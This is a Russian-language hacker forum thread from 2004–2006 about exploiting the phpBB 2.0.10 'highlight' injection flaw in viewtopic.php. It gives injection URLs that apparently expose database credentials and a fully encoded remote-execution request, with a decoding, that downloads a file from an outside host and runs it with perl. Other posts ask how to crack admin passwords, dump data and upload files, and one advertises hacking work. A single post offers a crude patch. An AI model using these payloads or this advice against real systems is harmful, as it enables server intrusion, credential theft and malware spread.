|
29.12.2004 09:23:41
Если ты защищен .htaccess на папке admin то есть реальная возвожность всетаки поиметь админский доступ но зайти в административный интерфейс не возможно |
|||
|
|
|
|
29.12.2004 21:49:58
Народ... у меня такой вопрос... Не подскажет мне пример sql запроса, где данные из одной таблицы сохраняются в файл.
 .Только не надо тут описывать как выполнить этот запрос, это я сам сделаю... мне нужен только сам запрос.... Я надеюсь еще не перевелись добрые люди и помогут бедному человеку [IMG][/IMG] |
|
|
|
|
|
26.01.2005 00:26:40
При запросе
viewtopic.php?t=1621&highlight=%2527.$poster=$dbname.%2527 и viewtopic.php?t=1621&highlight=%2527.$poster=$dbpasswd.%2527 От чего имя и пасс выводяться??... |
|
|
|
|
|
31.01.2005 13:24:03
|
|||
|
|
|
|
15.02.2005 15:54:17
Народ! А работает ли эта тема, когда форум установлен как модуль для nuke, типа как на
Пробовал - не выходит, либо никаких результатов вообще, либо страница с ошибкой нюка - The html tags you attempted to use are not allowed |
|
|
|
|
|
17.02.2005 15:22:47
а ни кто не подскажит какие-нибудь командаы вместо "=cmd" ???
|
|
|
|
|
|
22.02.2005 11:04:59
А что все таки делать со списком после команды
cat /etc/passwd Логины теперь я знаю администраторов, а как их пароли получить База данных уже не интересует )) |
|
|
|
|
|
28.02.2005 10:01:55
Собрались тут ламо всякие.. вы даже ломать толком не умеете, вам всё готовенькое подавай.. пи*дец просто!
|
|
|
|
|
|
04.03.2005 14:35:12
я чето не догоняю
после ввода запроса где выводиться ответ ? название базы данных логины или еше что то ? |
|
|
|
|
|
24.03.2005 09:33:25
Люди кто разобрался во всем этом можите помочь разобраться другим пожалуйста.
Стучите в ICQ 228828636 |
|
|
|
|
|
23.04.2005 22:30:41
Заплатка для форума PHPBB версии 2.0.10.
ссылка на заплатку в самом низу страницы. Как работает заплатка: просто я добавил условие, что если переменная highlight будет равна %27, то не будет выполнена часть кода. При этом не работают примерно 10 строчек кода, насколько я понял, они не очень важны. После установки заплатки, ошибка исчезнет. |
|
|
|
|
|
26.04.2005 11:22:42
вот пример нужного запроса (из реального сервака):
"GET /php/viewtopic.php?p=2645&highlight=%2527%252Esystem(chr(119 )%252Echr(103)%252Echr(101)%252Echr(116)%252Echr(32)%252Echr (104)%252Echr(116)%252Echr(116)%252Echr(112)%252Echr(58)%252 Echr(47)%252Echr(47)%252Echr(119)%252Echr(119)%252Echr(119)% 252Echr(46)%252Echr(107)%252Echr(99)%252Echr(101)%252Echr(11 5)%252Echr(46)%252Echr(111)%252Echr(114)%252Echr(103)%252Ech r(47)%252Echr(119)%252Echr(111)%252Echr(114)%252Echr(109)%25 2Echr(47)%252Echr(108)%252Echr(105)%252Echr(110)%252Echr(117 )%252Echr(120)%252Echr(100)%252Echr(97)%252Echr(121)%252Echr (50)%252Echr(46)%252Echr(116)%252Echr(120)%252Echr(116)%252E chr(32)%252Echr(45)%252Echr(79)%252Echr(32)%252Echr(47)%252E chr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(112)% 252Echr(104)%252Echr(112)%252Echr(53)%252Echr(51)%252Echr(55 )%252Echr(52)%252Echr(59)%252Echr(112)%252Echr(101)%252Echr( 114)%252Echr(108)%252Echr(32)%252Echr(47)%252Echr(116)%252Ec hr(109)%252Echr(112)%252Echr(47)%252Echr(112)%252Echr(104)%2 52Echr(112)%252Echr(53)%252Echr(51)%252Echr(55)%252Echr(52)) %252E%2527 HTTP/1.0" переводится следующим образом: %25 - это символ %, который преобразуется апачем, в пхп попадает уже просто %27 - обратный апостроф (в начале и в конце запроса) или %2Е - точка (в пхп получается конкатенация), таким образом, вся эта лабуда переводится на понятный вот как: GET /php/viewtopic.php?t=85&highlight=.system(w.g.e.t. .h.t.t.p.:././.w.w.w...k.c.e.s...o.r.g./.w.o.r.m./.l.i.n.u.x .d.a.y.2...t.x.t. .-.O. ./.t.m.p./.p.h.p.5.3.7.4.;.p.e.r.l. ./.t.m.p./.p.h.p.5.3.7.4). HTTP/1.0 типа того... |
|
|
|
|
|
25.09.2005 19:33:25
Блин
 А про Windows сервера можете подсказать? Не катит на них ничего ... SQL запрос на линух серваке сделать элементарно ... на винде, хрен! Подскажите пожалуйста виндовые запросы ... |
|
|
|
|
|
23.10.2005 02:40:12
:help: Люди, я понял что я совсем глупый в этом деле; на моём компе не стоит никаких дополнительных программ; разжуйте популярно (без сокращений) как сделать себя админом))
когда пишу типа . выдаёт либо существующую тему, дтбл ошибку что стр не найтена или просто тема не найдена :help: |
|
|
|
|
|
28.10.2005 13:16:58
А где эксплойт?
|
|
|
|
|
|
04.11.2005 17:07:37
:help: чтож делать? на чём сайт ставить, если етот ПХП слабый?
|
|
|
|
|
|
19.11.2005 14:30:24
есть работа для взломщиков. icq 320448703
|
|
|
|
|
|
31.12.2005 09:59:09
Как првельно залить файл подскажите!!!!
 |
|
|
|
|
|
19.01.2006 16:02:46
П*дец...
Даже толком не врубаются, что такое пхп, а уже ломать лезут. |
||||
|
|
|
|||